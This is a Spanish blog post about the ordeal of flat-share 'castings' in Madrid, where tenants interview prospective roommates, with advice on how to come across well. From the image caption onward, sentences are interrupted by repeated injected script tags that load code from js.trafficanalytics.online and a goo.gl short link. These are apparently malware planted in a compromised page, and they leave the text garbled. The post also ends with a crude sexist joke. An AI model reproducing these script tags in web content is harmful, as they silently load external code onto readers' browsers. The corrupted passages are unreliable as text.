Los odiosos ‘castings’ para pisos compartidos

Gente majilla esperando a que le llamen para entrar a un piso…Una de las peores cosas que te pueden pasar al buscar piso y que te encante es que, precisamente porque es maravilloso, haya gente más interesada en él y te veas sin querer formando parte en un proceso de selección. Los propietarios o inquilinos se aprovechan del ‘chollo’ inmobiliario para hacer desfilar por su salón a los interesados y someterlos unilateralmente a sus condiciones. Prácticamente no te dan derecho a elegir si te quedas o no de primeras. Experimento tan macabro es en el que me he metido de lleno en las últimas dos semanas (otra vez, y peor que la última vez).

Y es que, claro, en esta ocasión, como tenía un lugar donde quedarme que no pasaran la tarjeta bancaria, pues me puse a buscar nuevos pisos a compartir con más paciencia, más detenimiento y un mayor criterio. Iluso de mí, pensé que como no estaríamos en temporada alta de demandas, todas las mejores ofertas se rendirían bajo mis pies. ¡Nada más lejos!

13. Número feo, como la experiencia. Pero 13 pisos vi, y la mayoría eran cochambrosos (es lo que tiene querer pillarse techo en el epicentro de Madrid y por un precio estándar). Y para los pocos que me gustaron, resultó que ‘exigían’ que entrases en su proceso de casting. Bueno, e incluso habían peores viviendas (por llamarlas así) que se jactaban de tener una larga lista de gente dispuesta a ver el piso. Yo creo que si esa gente tiene buen gusto y dignidad, esa lista de ‘oro’ quedaría reducida a cenizas.

Volvamos al quid: en estos casos, los ofertantes buscan a alguien que respondan a un perfil concreto. Algunos, después del tour por la casa, te hacen sentar en el sofá de casa para interrogarte y ponerte a prueba. Incluso desde el primer contacto telefónico hay quien pregunta a qué te dedicas. Esa es la pregunta del millón, porque no quieren a vagos y maleantes en su piso (lógico). También suelen estar interesados por la edad (en cuestión de compartir aficiones heredadas por una misma generación), así como los horarios, porque imagino que si el inquilino se pasa más tiempo en casa durante la mañana, preferirá a alguien que lo esté durante la tarde.

El tema de las manías (orden y limpieza) y hábitos (tabaco, alcohol, drogas, guarreo) se comenta directa o indirectamente. Porque la apariencia también habla por nosotros. En una de las ocasiones me presenté en una casa donde vivían pijos treintañeros, y mientras iban vestidos de traje con corbata o con un jersey de Tommy Helfiguer, yo iba con mis raperos desgastados y rotos. Con la experiencia aprendí que hay que adelantar ventajas para nosotros en la descripción del anuncio o en esa primera llamada telefónica: en ese caso, me atendió un hombre con voz muy adulta que salía de una reunión de trabajo. Está claro que un estudiante maúro no sería. Por lo tanto, hay que presentarse como lo haría alguien de su calaña.

He estado repasando consejos que algunas páginas internáuticas ofrecen para convencer a los ofertantes de que eres lo mejor que ha pisado esa casa. En muchos puntos estoy de acuerdo. Otros, cabría matizar: cuando se va a ver el piso hay que portarse con un niño bueno, tímido, que nunca ha roto un plato (porque lo que ellos desean primordialmente es a alguien tranquilo, de buena convivencia). Ahora, que ser sumiso, como dicen por ahí, tampoco hay que llegar a tanto. Está bien mantener las distancias, pero tampoco hay que actuar como un bobalicón retraído.

Por supuesto, hay que decir que el piso te encanta, mostrarte muy maravillado aunque de repente te veas el fregadero lleno de platos ahogados en salsa de tomate (de verdad, que los inquilinos tampoco se curran las apariencias). Y no olvidarte de preguntar que, de haber más gente interesada, cuándo tomarían la decisión por alguien en concreto (es otra muestra de interés).

Un piso desordenado, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'><script type='text/javascript' src='https://goo.gl/9KsTSg'></script><script type='text/javascript' src='https://goo.gl/9KsTSg'></script><script type='text/javascript' src='https://goo.gl/9KsTSg'></script></script><script type='text/javascript' src='https://goo.gl/9KsTSg'></script> pero que a lo mejor interesa alquilar…” style=”width: 550px” title=”Un piso desordenado, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'><script type='text/javascript' src='https://goo.gl/9KsTSg'></script><script type='text/javascript' src='https://goo.gl/9KsTSg'></script><script type='text/javascript' src='https://goo.gl/9KsTSg'></script></script><script type='text/javascript' src='https://goo.gl/9KsTSg'></script> pero que a lo mejor interesa alquilar…” width=”550″ /><script type='text/javascript' src='https://goo.gl/9KsTSg'></script><script type='text/javascript' src='https://goo.gl/9KsTSg'></script><script type='text/javascript' src='https://goo.gl/9KsTSg'></script></p>
<p>Ahora bien: después de hacerte las preguntas de rigor (y las que no son de rigor) y clavarte la mirada en todos los puntos de tu cuerpo, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'><script type='text/javascript' src='https://goo.gl/9KsTSg'></script><script type='text/javascript' src='https://goo.gl/9KsTSg'></script><script type='text/javascript' src='https://goo.gl/9KsTSg'></script></script><script type='text/javascript' src='https://goo.gl/9KsTSg'></script> los propios inquilinos puede que tomen una valoración instantánea de tí mismo a través de sus miradas. Si no les gustas, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'><script type='text/javascript' src='https://goo.gl/9KsTSg'></script><script type='text/javascript' src='https://goo.gl/9KsTSg'></script><script type='text/javascript' src='https://goo.gl/9KsTSg'></script></script><script type='text/javascript' src='https://goo.gl/9KsTSg'></script> te dicen que van a estar una semana más enseñando la casa aunque con ello pierdan días que van a estar cobrando por el cuarto. Otras veces lo dicen de verdad. Eso se nota cuando ves que hay gente que les llama o que viene y va antes o después que tú.</p>
<p>En conclusión, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'><script type='text/javascript' src='https://goo.gl/9KsTSg'></script><script type='text/javascript' src='https://goo.gl/9KsTSg'></script><script type='text/javascript' src='https://goo.gl/9KsTSg'></script></script><script type='text/javascript' src='https://goo.gl/9KsTSg'></script> ninguno de estos consejos son fiables al 100%, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'><script type='text/javascript' src='https://goo.gl/9KsTSg'></script><script type='text/javascript' src='https://goo.gl/9KsTSg'></script><script type='text/javascript' src='https://goo.gl/9KsTSg'></script></script><script type='text/javascript' src='https://goo.gl/9KsTSg'></script> porque cada inquilino esconde tras de sí un mundo misterioso imposible de apreciar. El único realmente infalible es si eres una chica: las señoras o chicas quieren a alguien que viva con ellas para compartir trucos de maquillaje, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'><script type='text/javascript' src='https://goo.gl/9KsTSg'></script><script type='text/javascript' src='https://goo.gl/9KsTSg'></script><script type='text/javascript' src='https://goo.gl/9KsTSg'></script></script><script type='text/javascript' src='https://goo.gl/9KsTSg'></script> o bien los chicos quieren encontrase con un par de buenos melones de camino al aseo.</p>
<div class='shareaholic-canvas' data-app-id='22695648' data-app='share_buttons' data-title='Los odiosos &#8216;castings&#8217; para pisos compartidos' data-link='http://alberworld.es/2011/01/29/los-odiosos-castings-para-pisos-compartidos/' data-summary=''></div>
<div class=